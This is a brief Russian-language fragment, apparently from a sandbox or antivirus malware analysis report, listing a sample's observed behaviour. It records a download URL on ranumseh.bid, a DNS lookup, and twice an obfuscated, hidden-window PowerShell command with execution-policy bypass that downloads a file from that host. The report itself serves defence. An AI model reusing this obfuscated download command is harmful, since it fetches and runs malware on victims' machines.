Техническая информация
- http://ranumseh.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owErSHel^l.exe ^-EX^e^cut^i^oNpO^l^i^Cy B^Y^PA^sS ^-N^oPrOfile -WIndOw^stylE^ hiDD^e^n ^(^New-Ob^J^E^Ct sysTe^m.Ne^t^.wE^b^Cl^IEnT)^.^DowNLOadfIl^E('http://ranumseh.bid/re...
- DNS ASK ra###seh.bid
- '<SYSTEM32>\cmd.exe' /C "p^owErSHel^l.exe ^-EX^e^cut^i^oNpO^l^i^Cy B^Y^PA^sS ^-N^oPrOfile -WIndOw^stylE^ hiDD^e^n ^(^New-Ob^J^E^Ct sysTe^m.Ne^t^.wE^b^Cl^IEnT)^.^DowNLOadfIl^E('http://ranumseh.bid/re...' (со скрытым окном)